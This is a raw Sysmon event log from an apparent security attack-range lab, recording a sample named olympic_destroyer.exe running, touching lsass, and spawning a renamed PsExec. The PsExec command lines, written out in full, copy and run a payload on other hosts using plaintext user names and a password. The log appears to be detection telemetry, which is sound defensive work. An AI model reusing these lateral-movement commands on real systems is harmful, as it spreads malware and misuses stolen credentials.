10:56:47.582{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291284Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.582{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291283Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.582{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291282Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.529{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12EF-6216-8B05-000000003802}3364C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291281Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.529{C8EA50B7-12E6-6216-4B05-000000003802}67926932C:\Temp\olympic_destroyer.exe{C8EA50B7-12EF-6216-8B05-000000003802}3364C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291280Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.536{C8EA50B7-12EF-6216-8B05-000000003802}3364C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-255.eu-central-1.compute.internal -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291279Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.529{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EF-6216-8B05-000000003802}3364C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291278Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.513{C8EA50B7-12EF-6216-8905-000000003802}6324C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291277Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.513{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12EF-6216-8905-000000003802}6324C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291276Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.513{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12EF-6216-8905-000000003802}6324C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291275Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:47.499{C8EA50B7-12EF-6216-8905-000000003802}6324C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291274Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.466{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291273Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.466{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291272Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.466{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291271Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.466{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291270Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.444{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EF-6216-8A05-000000003802}6276C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291269Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.444{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EF-6216-8A05-000000003802}6276C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291268Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.444{C8EA50B7-12EF-6216-8A05-000000003802}62765776C:\Windows\system32\conhost.exe{C8EA50B7-12EF-6216-8905-000000003802}6324C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291267Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.428{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12EF-6216-8A05-000000003802}6276C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291266Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.413{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EF-6216-8A05-000000003802}6276C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000291265Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.344{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D45346C5AD0EDB1479C73DF7B1487106,SHA256=69CB9A37E7180942B049AFD45B7A9653DCE740242ACE307A718EBB0E8C4866A4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291264Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.297{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12EF-6216-8905-000000003802}6324C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291263Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.297{C8EA50B7-12E6-6216-4B05-000000003802}67926932C:\Temp\olympic_destroyer.exe{C8EA50B7-12EF-6216-8905-000000003802}6324C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291262Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.298{C8EA50B7-12EF-6216-8905-000000003802}6324C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291261Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.297{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EF-6216-8905-000000003802}6324C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291260Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.282{C8EA50B7-12EF-6216-8705-000000003802}996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291259Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.282{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12EF-6216-8705-000000003802}996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291258Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.282{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12EF-6216-8705-000000003802}996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291257Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:47.266{C8EA50B7-12EF-6216-8705-000000003802}996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291256Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.260{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291255Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.260{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291254Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 